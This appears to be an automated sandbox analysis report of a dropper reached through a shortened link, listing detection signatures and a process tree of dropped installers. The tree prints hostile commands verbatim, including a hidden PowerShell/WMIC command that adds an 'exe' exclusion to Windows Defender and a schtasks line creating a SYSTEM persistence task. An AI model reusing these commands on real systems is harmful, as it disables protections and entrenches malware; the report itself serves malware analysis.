Analysis

  • max time kernel
    389s
  • max time network
    395s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64 arch:x86 image:win10-20240611-en locale:en-us os:windows10-1703-x64 system
  • submitted
    16-07-2024 05:11

General

  • Target

    https://ify.ac/1IZk

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 62 IoCs
  • NSIS installer 2 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1IZk"
    1⤵
      PID:4764
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:4444
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • NTFS ADS
      PID:228
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5004
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1612
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4240
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:4560
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:1844
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:4456
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4472
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:2944
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2992
      • C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe
        "C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp" /SL5="$3042A,6120275,56832,C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4376
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
            3⤵
              PID:4300
            • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
              "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" b8c38ab23cb29b463990bcb44875ebb1
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1788
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 820
                4⤵
                • Program crash
                PID:3688
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 796
                4⤵
                • Program crash
                PID:4808
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 840
                4⤵
                • Program crash
                PID:3516
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 964
                4⤵
                • Program crash
                PID:2264
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 996
                4⤵
                • Program crash
                PID:3256
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1020
                4⤵
                • Program crash
                PID:2776
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1128
                4⤵
                • Program crash
                PID:340
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1180
                4⤵
                • Program crash
                PID:1888
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1232
                4⤵
                • Program crash
                PID:2708
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1252
                4⤵
                • Program crash
                PID:4760
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1276
                4⤵
                • Program crash
                PID:1180
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1228
                4⤵
                • Program crash
                PID:4396
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1164
                4⤵
                • Program crash
                PID:3676
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
                4⤵
                • Program crash
                PID:2368
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1696
                4⤵
                • Program crash
                PID:1332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1804
                4⤵
                • Program crash
                PID:1376
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1988
                4⤵
                • Program crash
                PID:1360
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1844
                4⤵
                • Program crash
                PID:3280
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1808
                4⤵
                • Program crash
                PID:4584
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1184
                4⤵
                • Program crash
                PID:5008
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1880
                4⤵
                • Program crash
                PID:4748
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
                4⤵
                • Program crash
                PID:3104
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1948
                4⤵
                • Program crash
                PID:232
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 824
                4⤵
                • Program crash
                PID:1376
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2064
                4⤵
                • Program crash
                PID:3280
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2140
                4⤵
                • Program crash
                PID:4620
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2168
                4⤵
                • Program crash
                PID:1552
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1820
                4⤵
                • Program crash
                PID:2096
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2112
                4⤵
                • Program crash
                PID:196
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2184
                4⤵
                • Program crash
                PID:5064
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2108
                4⤵
                • Program crash
                PID:1716
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1532
                4⤵
                • Program crash
                PID:4556
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2220
                4⤵
                • Program crash
                PID:332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1872
                4⤵
                • Program crash
                PID:4668
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2276
                4⤵
                • Program crash
                PID:3184
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
                4⤵
                • Program crash
                PID:4268
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2404
                4⤵
                • Program crash
                PID:3680
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
                4⤵
                  PID:4276
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2320
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                  4⤵
                    PID:1528
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2904
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2508
                    4⤵
                    • Program crash
                    PID:3104
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2576
                    4⤵
                    • Program crash
                    PID:4572
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
                    4⤵
                      PID:196
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3512
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2260
                      4⤵
                      • Program crash
                      PID:3272
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
                      4⤵
                      • Program crash
                      PID:3068
                    • C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
                      C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe
                      4⤵
                      • Executes dropped EXE
                      PID:1860
                      • C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp" /SL5="$3033E,4415326,54272,C:\Users\Admin\AppData\Local\Temp\T3rxfmyX\PIPT5ys120HSNpWQJCG.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:2208
                        • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                          "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
                          6⤵
                          • Executes dropped EXE
                          PID:2348
                        • C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
                          "C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
                          6⤵
                          • Executes dropped EXE
                          PID:3944
                    • C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe
                      C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe /sid=3 /pid=1090
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1792
                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:5928
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2376
                      4⤵
                      • Program crash
                      PID:3752
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2212
                      4⤵
                      • Program crash
                      PID:4748
                    • C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe
                      C:\Users\Admin\AppData\Local\Temp\agv8nXug\mvTGCUpbae.exe --silent --allusers=0
                      4⤵
                      • Executes dropped EXE
                      PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                        C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --silent --allusers=0 --server-tracking-blob=MWQ2MDgwMGU2ZWQwM2MwN2IxZThmNjYyM2ViOGRmYTA5OTgyY2M3OWJjODE3ZWQxYjFlZDE4N2FkMjEwZmJjYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY4ODkuNzk4NiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiY2M5NjA1YjMtNGMwYS00ZTYyLWEzNjItZTJkZmM2ZGRmMjA0In0=
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        PID:1456
                        • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                          C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2d4,0x304,0x6f6db1f4,0x6f6db200,0x6f6db20c
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:208
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4584
                        • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1456 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051500" --session-guid=2aaf9e2d-2803-4c30-aa74-1618091f706b --server-tracking-blob=… --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C404000000000000
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          PID:3040
                          • C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe
                            C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x304,0x308,0x30c,0x2d4,0x310,0x6c80b1f4,0x6c80b200,0x6c80b20c
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:5172
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:5852
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --version
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:6072
                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515001\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x1529f88,0x1529f94,0x1529fa0
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3684
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2472
                      4⤵
                      • Program crash
                      PID:3520
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
                      4⤵
                        PID:1716
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          5⤵
                            PID:2320
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe"
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2904
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2520
                          4⤵
                          • Program crash
                          PID:460
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2060
                          4⤵
                          • Program crash
                          PID:340
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2160
                          4⤵
                          • Program crash
                          PID:836
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2428
                          4⤵
                          • Program crash
                          PID:460
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2532
                          4⤵
                          • Program crash
                          PID:5356
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2396
                          4⤵
                          • Program crash
                          PID:5484
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
                          4⤵
                          • Program crash
                          PID:5528
                        • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
                          C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe /did=757674 /S
                          4⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Enumerates system info in registry
                          PID:5576
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                            5⤵
                              PID:5792
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                6⤵
                                  PID:5836
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5848
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      8⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5984
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe\" z0 /badidB 757674 /S" /V1 /F
                                5⤵
                                • Drops file in Windows directory
                                • Scheduled Task/Job: Scheduled Task
                                PID:6108
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1048
                                5⤵
                                • Program crash
                                PID:5632
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2304
                              4⤵
                              • Program crash
                              PID:5600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2524
                              4⤵
                              • Program crash
                              PID:5640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2020
                              4⤵
                              • Program crash
                              PID:5664
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2540
                              4⤵
                              • Program crash
                              PID:5688
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
                              4⤵
